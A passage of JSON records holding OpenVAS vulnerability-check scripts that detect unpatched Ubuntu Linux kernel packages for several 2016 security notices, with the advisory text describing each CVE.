\"CVE-2016-3135\", \"CVE-2015-7566\", \"CVE-2015-8767\",\n \t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-wily USN-2930-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-wily'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n Ben Hawkes discovered an integer overflow in the Linux netfilter\n implementation. On systems running 32 bit kernels, a local unprivileged\n attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code with administrative privileges.\n (CVE-2016-3135)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Ralf Spenneberg discovered that the USB driver for Treo devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2016-2782)\");\n script_tag(name:\"affected\", value:\"linux-lts-wily on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2930-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2930-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-generic\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-generic-lpae\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-lowlatency\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc-e500mc\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc-smp\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc64-emb\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc64-smp\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2930-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-0723", "CVE-2015-8767", "CVE-2015-7566", "CVE-2016-3135", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842691", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842691", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2930-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842691\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:36:46 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-3135\", \"CVE-2015-7566\", \"CVE-2015-8767\",\n \t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2930-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n Ben Hawkes discovered an integer overflow in the Linux netfilter\n implementation. On systems running 32 bit kernels, a local unprivileged\n attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code with administrative privileges.\n (CVE-2016-3135)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Ralf Spenneberg discovered that the USB driver for Treo devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2016-2782)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2930-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2930-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-generic\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-generic-lpae\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-lowlatency\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc-e500mc\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc-smp\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc64-emb\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc64-smp\", ver:\"4.2.0-34.39\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-raspi2 USN-2930-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-0723", "CVE-2015-8767", "CVE-2015-7566", "CVE-2016-3135", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842698", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-2930-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842698\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 05:11:14 +0100 (Thu, 17 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-3135\", \"CVE-2015-7566\", \"CVE-2015-8767\",\n\t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-2930-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary\n code with administrative privileges. (CVE-2016-3134)\n\n Ben Hawkes discovered an integer overflow in the Linux netfilter\n implementation. On systems running 32 bit kernels, a local unprivileged\n attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code with administrative privileges.\n (CVE-2016-3135)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Ralf Spenneberg discovered that the USB driver for Treo devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2016-2782)\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2930-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2930-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-1027-raspi2\", ver:\"4.2.0-1027.35\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-utopic USN-2948-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2782", "CVE-2016-2847", "CVE-2016-0723", "CVE-2016-2085", "CVE-2015-8812", "CVE-2016-2550", "CVE-2015-7833", "CVE-2015-7566"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842713", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842713", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-utopic USN-2948-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842713\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-07 05:01:24 +0200 (Thu, 07 Apr 2016)\");\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-0723\",\n \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-utopic USN-2948-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-utopic'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ralf Spenneberg discovered that the USB\n driver for Clie devices in the Linux kernel did not properly sanity check\n the endpoints reported by the device. An attacker with physical access could\n cause a denial of service (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n Venkatesh Pottem discovered a use-after-free vulnerability in the Linux\n kernel's CXGB3 driver. A local attacker could use this to cause a denial of\n service (system crash) or possibly execute arbitrary code. (CVE-2015-8812)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Xiaofei Rex Guo discovered a timing side channel vulnerability in the Linux\n Extended Verification Module (EVM). An attacker could use this to affect\n system integrity. (CVE-2016-2085)\n\n David Herrmann discovered that the Linux kernel incorrectly accounted file\n descriptors to the original opener for in-flight file descriptors sent over\n a unix domain socket. A local attacker could use this to cause a denial of\n service (resource exhaustion). (CVE-2016-2550)\n\n Ralf Spenneberg discovered that the USB driver for Treo devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2016-2782)\n\n It was discovered that the Linux kernel did not enforce limits on the\n amount of data allocated to buffer pipes. A local attacker could use this\n to cause a denial of service (resource exhaustion). (CVE-2016-2847)\");\n script_tag(name:\"affected\", value:\"linux-lts-utopic on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2948-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2948-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-generic\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-generic-lpae\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-lowlatency\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-powerpc-e500mc\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-powerpc-smp\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-powerpc64-emb\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-powerpc64-smp\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-2929-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-2547", "CVE-2016-2544", "CVE-2016-2545", "CVE-2015-7833", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842690", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-trusty USN-2929-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842690\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:36:33 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n\t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\",\n\t\t\"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\",\n\t\t\"CVE-2016-2549\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-2929-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n It was discovered that the Linux kernel did not properly enforce rlimits\n for file descriptors sent over UNIX domain sockets. A local attacker could\n use this to cause a denial of service. (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a client before\n attempting to clear it. A local attacker could use this to cause a denial\n of service (system crash). (CVE-2016-2543)\n\n Dmitry Vyukov discovered that a race condition existed in the Advanced\n Linux Sound Architecture (ALSA) framework between timer setup and closing\n of the client, resulting in a use-after-free. A local attacker could use\n this to cause a denial of service. (CVE-2016-2544)\n\n Dmitry Vyukov discovered a race condition in the timer handling\n implementation of the Advanced Linux Sound Architecture (ALSA) framework,\n resulting in a use-after-free. A local attacker could use this to cause a\n denial of service (system crash). (CVE-2016-2545)\n\n Dmitry Vyukov discovered race conditions in the Advanced Linux Sound\n Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A\n local attacker could use this to cause a denial of service (system crash)\n or possibly execute arbitrary code. (CVE-2016-2546)\n\n Dmitry Vyukov discovered th ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2929-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2929-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-generic\", ver:\"3.13.0-83.127~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-generic-lpae\", ver:\"3.13.0-83.127~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2929-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-2547", "CVE-2016-2544", "CVE-2016-2545", "CVE-2015-7833", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842692", "href": 